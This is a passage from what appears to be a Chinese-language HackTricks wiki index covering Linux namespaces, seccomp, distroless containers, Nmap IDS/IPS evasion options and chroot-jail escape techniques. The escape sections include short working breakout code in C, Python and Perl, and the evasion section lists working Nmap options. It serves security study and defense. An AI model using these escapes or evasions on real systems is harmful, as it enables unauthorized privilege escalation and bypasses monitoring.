Namespaces » Time Namespace » 参考文献","id":"1731","title":"参考文献"},"1732":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 用户命名空间","id":"1732","title":"用户命名空间"},"1733":{"body":"用户命名空间是一个 Linux 内核特性, 提供用户和组 ID 映射的隔离 ,允许每个用户命名空间拥有 自己的一组用户和组 ID 。这种隔离使得在不同用户命名空间中运行的进程 可以拥有不同的权限和所有权 ,即使它们在数值上共享相同的用户和组 ID。 用户命名空间在容器化中特别有用,每个容器应该拥有自己独立的用户和组 ID 集,从而在容器与主机系统之间提供更好的安全性和隔离。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 基本信息","id":"1733","title":"基本信息"},"1734":{"body":"当创建一个新的用户命名空间时,它 以一个空的用户和组 ID 映射集开始 。这意味着在新的用户命名空间中运行的任何进程 最初在命名空间外没有权限 。 可以在新命名空间中的用户和组 ID 与父(或主机)命名空间中的 ID 之间建立 ID 映射。这 允许新命名空间中的进程拥有与父命名空间中的用户和组 ID 对应的权限和所有权 。然而,ID 映射可以限制在特定范围和 ID 子集上,从而对新命名空间中进程授予的权限进行细粒度控制。 在用户命名空间内, 进程可以在命名空间内拥有完全的 root 权限(UID 0) ,同时在命名空间外仍然拥有有限的权限。这允许 容器在其自己的命名空间内以类似 root 的能力运行,而不在主机系统上拥有完全的 root 权限 。 进程可以使用 setns() 系统调用在命名空间之间移动,或使用带有 CLONE_NEWUSER 标志的 unshare() 或 clone() 系统调用创建新的命名空间。当进程移动到新命名空间或创建一个新命名空间时,它将开始使用与该命名空间关联的用户和组 ID 映射。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 工作原理:","id":"1734","title":"工作原理:"},"1735":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 实验:","id":"1735","title":"实验:"},"1736":{"body":"CLI bash sudo unshare -U [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 
命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行,而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash 要使用用户命名空间,Docker 守护进程需要使用 --userns-remap=default 启动(在 Ubuntu 14.04 中,可以通过修改 /etc/default/docker 然后执行 sudo service docker restart 来完成)","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 创建不同的命名空间","id":"1736","title":"创建不同的命名空间"},"1737":{"body":"bash ls -l /proc/self/ns/user\\nlrwxrwxrwx 1 root root 0 Apr 4 20:57 /proc/self/ns/user -> \'user:[4026531837]\' 可以通过以下命令检查 Docker 容器中的用户映射: bash cat /proc/self/uid_map\\n0 0 4294967295 --> Root is root in host\\n0 231072 65536 --> Root is 231072 userid in host 或从主机使用: bash cat /proc//uid_map","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 检查您的进程在哪个命名空间中","id":"1737","title":"检查您的进程在哪个命名空间中"},"1738":{"body":"bash sudo find /proc -maxdepth 3 -type l -name user -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name user -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 查找所有用户命名空间","id":"1738","title":"查找所有用户命名空间"},"1739":{"body":"bash nsenter -U TARGET_PID --pid /bin/bash 此外,您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/user)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 进入用户命名空间","id":"1739","title":"进入用户命名空间"},"174":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 发送一些 TTL 足够到达 IDS/IPS 但不足以到达最终系统的数据包。然后,发送另一组与之前相同序列的数据包,以便 IPS/IDS 会认为它们是重复的而不会检查,但实际上它们携带了恶意内容。 Nmap 选项: --ttlvalue ","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » TTL 操作","id":"174","title":"TTL 操作"},"1740":{"body":"bash unshare -U [--map-user=|] [--map-group=|] [--map-root-user] [--map-current-user] bash # Container\\nsudo unshare -U /bin/bash\\nnobody@ip-172-31-28-169:/home/ubuntu$ #Check how the user is nobody # From the host\\nps -ef | grep bash # The user inside the host is still root, not nobody\\nroot 27756 27755 0 21:11 pts/10 00:00:00 /bin/bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 创建新的用户命名空间(带映射)","id":"1740","title":"创建新的用户命名空间(带映射)"},"1741":{"body":"在用户命名空间的情况下, 当创建一个新的用户命名空间时,进入该命名空间的进程会被授予该命名空间内的完整能力集 。这些能力允许进程执行特权操作,例如 挂载 文件系统 、创建设备或更改文件的所有权,但 仅在其用户命名空间的上下文中 。 例如,当您在用户命名空间内拥有 CAP_SYS_ADMIN 能力时,您可以执行通常需要此能力的操作,如挂载文件系统,但仅在您的用户命名空间的上下文中。您使用此能力执行的任何操作都不会影响主机系统或其他命名空间。 warning 因此,即使在新的用户命名空间内获取一个新进程 会让您恢复所有能力 (CapEff: 000001ffffffffff),您实际上 只能使用与命名空间相关的能力 (例如挂载),而不是所有能力。因此,仅凭这一点不足以逃离 Docker 容器。 bash # There are the syscalls that are filtered after changing User namespace with:\\nunshare -UmCpf bash Probando: 0x067 . . . Error\\nProbando: 0x070 . . . Error\\nProbando: 0x074 . . . Error\\nProbando: 0x09b . . . Error\\nProbando: 0x0a3 . . . Error\\nProbando: 0x0a4 . . . Error\\nProbando: 0x0a7 . . . Error\\nProbando: 0x0a8 . . . Error\\nProbando: 0x0aa . . . Error\\nProbando: 0x0ab . . . Error\\nProbando: 0x0af . . . Error\\nProbando: 0x0b0 . . . Error\\nProbando: 0x0f6 . . . Error\\nProbando: 0x12c . . . Error\\nProbando: 0x130 . . . Error\\nProbando: 0x139 . . . Error\\nProbando: 0x140 . . . Error\\nProbando: 0x141 . . . 
Error tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 恢复能力","id":"1741","title":"恢复能力"},"1742":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » UTS Namespace","id":"1742","title":"UTS Namespace"},"1743":{"body":"UTS(UNIX时间共享系统)命名空间是一个Linux内核特性,它提供了两个系统标识符的 隔离 : 主机名 和 NIS (网络信息服务)域名。这种隔离允许每个UTS命名空间拥有 自己的独立主机名和NIS域名 ,这在容器化场景中特别有用,因为每个容器应该看起来像是一个具有自己主机名的独立系统。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 基本信息","id":"1743","title":"基本信息"},"1744":{"body":"当创建一个新的UTS命名空间时,它会从其父命名空间 复制主机名和NIS域名 。这意味着在创建时,新的命名空间 共享与其父命名空间相同的标识符 。然而,在命名空间内对主机名或NIS域名的任何后续更改将不会影响其他命名空间。 UTS命名空间内的进程 可以使用sethostname()和setdomainname()系统调用分别更改主机名和NIS域名 。这些更改是本地的,不会影响其他命名空间或主机系统。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWUTS标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的主机名和NIS域名。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 工作原理:","id":"1744","title":"工作原理:"},"1745":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 实验:","id":"1745","title":"实验:"},"1746":{"body":"CLI bash sudo unshare -u [--mount-proc] /bin/bash 通过挂载新的 /proc 
文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行,而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 创建不同的命名空间","id":"1746","title":"创建不同的命名空间"},"1747":{"body":"bash ls -l /proc/self/ns/uts\\nlrwxrwxrwx 1 root root 0 Apr 4 20:49 /proc/self/ns/uts -> \'uts:[4026531838]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 检查您的进程所在的命名空间","id":"1747","title":"检查您的进程所在的命名空间"},"1748":{"body":"bash sudo find /proc -maxdepth 3 -type l -name uts -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name uts -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 查找所有 UTS 命名空间","id":"1748","title":"查找所有 UTS 命名空间"},"1749":{"body":"bash nsenter -u TARGET_PID --pid /bin/bash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 
HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 进入 UTS 命名空间","id":"1749","title":"进入 UTS 命名空间"},"175":{"body":"只需向数据包中添加垃圾数据,以避免 IPS/IDS 签名。 Nmap 选项: --data-length 25","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 避免签名","id":"175","title":"避免签名"},"1750":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp","id":"1750","title":"Seccomp"},"1751":{"body":"Seccomp ,即安全计算模式,是 Linux内核的一个安全特性,用于过滤系统调用 。它将进程限制在一组有限的系统调用中(exit()、sigreturn()、read()和write(),仅适用于已打开的文件描述符)。如果进程尝试调用其他任何内容,内核将使用SIGKILL或SIGSYS终止该进程。该机制并不虚拟化资源,而是将进程与资源隔离。 激活seccomp有两种方法:通过prctl(2)系统调用与PR_SET_SECCOMP,或者对于3.17及以上版本的Linux内核,使用seccomp(2)系统调用。通过写入/proc/self/seccomp来启用seccomp的旧方法已被弃用,取而代之的是prctl()。 一个增强功能, seccomp-bpf ,增加了使用可自定义策略过滤系统调用的能力,使用伯克利数据包过滤器(BPF)规则。该扩展被OpenSSH、vsftpd以及Chrome OS和Linux上的Chrome/Chromium浏览器等软件利用,以实现灵活高效的系统调用过滤,提供了对现在不再支持的Linux systrace的替代方案。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » 基本信息","id":"1751","title":"基本信息"},"1752":{"body":"在此模式下,Seccomp 仅允许系统调用 exit()、sigreturn()、read()和write(),仅适用于已打开的文件描述符。如果进行任何其他系统调用,进程将被SIGKILL终止。 seccomp_strict.c #include \\n#include \\n#include \\n#include \\n#include \\n#include //From https://sysdig.com/blog/selinux-seccomp-falco-technical-discussion/\\n//gcc seccomp_strict.c -o seccomp_strict int main(int argc, char **argv)\\n{\\nint output = open(\\"output.txt\\", O_WRONLY);\\nconst char *val = \\"test\\"; 
//enables strict seccomp mode\\nprintf(\\"Calling prctl() to set seccomp strict mode...\\\\n\\");\\nprctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); //This is allowed as the file was already opened\\nprintf(\\"Writing to an already open file...\\\\n\\");\\nwrite(output, val, strlen(val)+1); //This isn\'t allowed\\nprintf(\\"Trying to open file for reading...\\\\n\\");\\nint input = open(\\"output.txt\\", O_RDONLY); printf(\\"You will not see this message--the process will be killed first\\\\n\\");\\n}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » 原始/严格模式","id":"1752","title":"原始/严格模式"},"1753":{"body":"此模式允许 使用可配置策略过滤系统调用 ,该策略是通过伯克利数据包过滤器规则实现的。 seccomp_bpf.c #include \\n#include \\n#include \\n#include //https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373\\n//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp void main(void) {\\n/* initialize the libseccomp context */\\nscmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); /* allow exiting */\\nprintf(\\"Adding rule : Allow exit_group\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); /* allow getting the current pid */\\n//printf(\\"Adding rule : Allow getpid\\\\n\\");\\n//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); printf(\\"Adding rule : Deny getpid\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0);\\n/* allow changing data segment size, as required by glibc */\\nprintf(\\"Adding rule : Allow brk\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); /* allow writing up to 512 bytes to fd 1 */\\nprintf(\\"Adding rule : Allow write upto 512 bytes to FD 1\\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2,\\nSCMP_A0(SCMP_CMP_EQ, 1),\\nSCMP_A2(SCMP_CMP_LE, 512)); /* if writing to any other fd, return -EBADF */\\nprintf(\\"Adding rule : Deny write to any FD except 1 \\\\n\\");\\nseccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1,\\nSCMP_A0(SCMP_CMP_NE, 1)); 
/* load and enforce the filters */\\nprintf(\\"Load rules and enforce \\\\n\\");\\nseccomp_load(ctx);\\nseccomp_release(ctx);\\n//Get the getpid is denied, a weird number will be returned like\\n//this process is -9\\nprintf(\\"this process is %d\\\\n\\", getpid());\\n}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp-bpf","id":"1753","title":"Seccomp-bpf"},"1754":{"body":"Seccomp-bpf 被 Docker 支持,以有效限制来自容器的 syscalls ,从而减少攻击面。您可以在 https://docs.docker.com/engine/security/seccomp/ 找到 默认 被 阻止的 syscalls ,而 默认 seccomp 配置文件 可以在这里找到 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 。 您可以使用以下命令运行具有 不同 seccomp 策略的 docker 容器: bash docker run --rm \\\\\\n-it \\\\\\n--security-opt seccomp=/path/to/seccomp/profile.json \\\\\\nhello-world 如果你想例如 禁止 一个容器执行某些 syscall ,像uname,你可以从 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 下载默认配置文件,然后 从列表中移除uname字符串 。 如果你想确保 某个二进制文件在docker容器内无法工作 ,你可以使用strace列出该二进制文件使用的syscalls,然后禁止它们。 在以下示例中,发现了uname的 syscalls : bash docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname note 如果您仅仅是使用 Docker 启动一个应用程序 ,您可以使用 strace 对其进行 分析 ,并 仅允许它所需的系统调用","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp in Docker","id":"1754","title":"Seccomp in Docker"},"1755":{"body":"Example from here 为了说明 Seccomp 功能,让我们创建一个 Seccomp 配置文件,禁用“chmod”系统调用,如下所示。 json {\\n\\"defaultAction\\": \\"SCMP_ACT_ALLOW\\",\\n\\"syscalls\\": [\\n{\\n\\"name\\": \\"chmod\\",\\n\\"action\\": \\"SCMP_ACT_ERRNO\\"\\n}\\n]\\n} 在上述配置中,我们将默认操作设置为“允许”,并创建了一个黑名单以禁用“chmod”。为了更安全,我们可以将默认操作设置为丢弃,并创建一个白名单以选择性地启用系统调用。 以下输出显示“chmod”调用返回错误,因为它在seccomp配置中被禁用。 bash $ docker run --rm -it --security-opt seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts\\nchmod: /etc/hosts: Operation not permitted 以下输出显示了“docker inspect”显示的配置文件: json \\"SecurityOpt\\": 
[\\n\\"seccomp:{\\\\\\"defaultAction\\\\\\":\\\\\\"SCMP_ACT_ALLOW\\\\\\",\\\\\\"syscalls\\\\\\":[{\\\\\\"name\\\\\\":\\\\\\"chmod\\\\\\",\\\\\\"action\\\\\\":\\\\\\"SCMP_ACT_ERRNO\\\\\\"}]}\\"\\n] tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » 示例 Seccomp 策略","id":"1755","title":"示例 Seccomp 策略"},"1756":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » Weaponizing Distroless","id":"1756","title":"Weaponizing Distroless"},"1757":{"body":"Distroless 容器是一种只包含 运行特定应用程序所需的必要依赖项 的容器,不包含任何不必要的软件或工具。这些容器旨在尽可能 轻量 和 安全 ,并旨在通过移除任何不必要的组件来 最小化攻击面 。 Distroless 容器通常用于 安全性和可靠性至关重要的生产环境 。 一些 distroless 容器 的 示例 包括: 由 Google 提供: https://console.cloud.google.com/gcr/images/distroless/GLOBAL 由 Chainguard 提供: https://github.com/chainguard-images/images/tree/main/images","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 什么是 Distroless","id":"1757","title":"什么是 Distroless"},"1758":{"body":"武器化 distroless 容器的目标是能够 在 distroless 所带来的限制 (系统中缺乏常见二进制文件)下 执行任意二进制文件和有效负载 ,以及绕过容器中常见的保护措施(例如 /dev/shm 被挂载为 只读 或 不可执行 )。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 武器化 Distroless","id":"1758","title":"武器化 Distroless"},"1759":{"body":"将在 2023 年的某个时候发布...","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 通过内存","id":"1759","title":"通过内存"},"176":{"body":"只需将数据包分片并发送。如果 IDS/IPS 没有重组它们的能力,它们将到达最终主机。 Nmap 选项: -f","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 分片数据包","id":"176","title":"分片数据包"},"1760":{"body":"openssl 在这篇文章中, 解释了二进制文件 openssl 经常出现在这些容器中,可能是因为它是 运行在容器内的软件所需 的。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Weaponizing Distroless » 通过现有二进制文件","id":"1760","title":"通过现有二进制文件"},"1761":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » 从监狱中逃脱","id":"1761","title":"从监狱中逃脱"},"1762":{"body":"在 https://gtfobins.github.io/ 中搜索是否可以执行任何具有 \\"Shell\\" 属性的二进制文件","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » GTFOBins","id":"1762","title":"GTFOBins"},"1763":{"body":"来自 wikipedia :chroot 机制 并不旨在防御 来自 特权 ( root ) 用户 的故意篡改。在大多数系统中,chroot 上下文无法正确堆叠,具有足够权限的 chroot 程序 可能会执行第二次 chroot 以突破 。 通常这意味着要逃脱,你需要在 chroot 内部是 root。 tip 工具 chw00t 是为了滥用以下场景并从 chroot 中逃脱而创建的。","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Chroot 逃逸","id":"1763","title":"Chroot 逃逸"},"1764":{"body":"warning 如果你在 chroot 内部是 root ,你 可以逃脱 ,通过创建 另一个 chroot 。这是因为两个 chroot 不能共存(在 Linux 中),所以如果你创建一个文件夹,然后 在那个新文件夹上创建一个新的 chroot ,而你 在外面 ,你现在将 在新的 chroot 之外 ,因此你将处于文件系统中。 这发生是因为通常 chroot 并不会将你的工作目录移动到指定的目录,所以你可以创建一个 chroot,但在它外面。 通常你不会在 chroot 监狱中找到 chroot 二进制文件,但你 可以编译、上传并执行 一个二进制文件: C: break_chroot.c\\nc #include \\n#include \\n#include //gcc break_chroot.c -o break_chroot int main(void)\\n{\\nmkdir(\\"chroot-dir\\", 0755);\\nchroot(\\"chroot-dir\\");\\nfor(int i = 0; i < 1000; i++) {\\nchdir(\\"..\\");\\n}\\nchroot(\\".\\");\\nsystem(\\"/bin/bash\\");\\n} Python\\npython #!/usr/bin/python\\nimport os\\nos.mkdir(\\"chroot-dir\\")\\nos.chroot(\\"chroot-dir\\")\\nfor i in range(1000):\\nos.chdir(\\"..\\")\\nos.chroot(\\".\\")\\nos.system(\\"/bin/bash\\") Perl\\nperl 
#!/usr/bin/perl\\nmkdir \\"chroot-dir\\";\\nchroot \\"chroot-dir\\";\\nforeach my $i (0..1000) {\\nchdir \\"..\\"\\n}\\nchroot \\".\\";\\nsystem(\\"/bin/bash\\");","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + CWD","id":"1764","title":"Root + CWD"},"1765":{"body":"warning 这与之前的情况类似,但在这种情况下, 攻击者将当前目录的文件描述符存储起来 ,然后 在新文件夹中创建 chroot 。最后,由于他对该 FD 在 chroot 外部 的 访问 ,他访问它并 逃脱 。 C: break_chroot.c\\nc #include \\n#include \\n#include //gcc break_chroot.c -o break_chroot int main(void)\\n{\\nmkdir(\\"tmpdir\\", 0755);\\ndir_fd = open(\\".\\", O_RDONLY);\\nif(chroot(\\"tmpdir\\")){\\nperror(\\"chroot\\");\\n}\\nfchdir(dir_fd);\\nclose(dir_fd);\\nfor(x = 0; x < 1000; x++) chdir(\\"..\\");\\nchroot(\\".\\");\\n}","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Saved fd","id":"1765","title":"Root + Saved fd"},"1766":{"body":"warning FD 可以通过 Unix Domain Sockets 传递,因此: 创建一个子进程 (fork) 创建 UDS 以便父进程和子进程可以通信 在子进程中在不同的文件夹中运行 chroot 在父进程中,创建一个在新子进程 chroot 之外的文件夹的 FD 通过 UDS 将该 FD 传递给子进程 子进程 chdir 到该 FD,因为它在其 chroot 之外,它将逃脱监禁","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Fork + UDS (Unix Domain Sockets)","id":"1766","title":"Root + Fork + UDS (Unix Domain Sockets)"},"1767":{"body":"warning 将根设备 (/) 挂载到 chroot 内的一个目录 进入该目录的 chroot 这在 Linux 中是可能的","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + Mount","id":"1767","title":"Root + Mount"},"1768":{"body":"warning 将 procfs 挂载到 chroot 内的一个目录 (如果尚未挂载) 查找具有不同 root/cwd 条目的 pid,例如:/proc/1/root 进入该条目的 chroot","breadcrumbs":"Linux Privilege Escalation » Escaping from Jails » Root + /proc","id":"1768","title":"Root + /proc"},"1769":{"body":"warning 创建一个 Fork (子进程) 并 chroot 到文件系统中更深的不同文件夹并在其上 CD 从父进程中,将子进程所在的文件夹移动到子进程 chroot 之前的文件夹 这个子进程将发现自己在 chroot 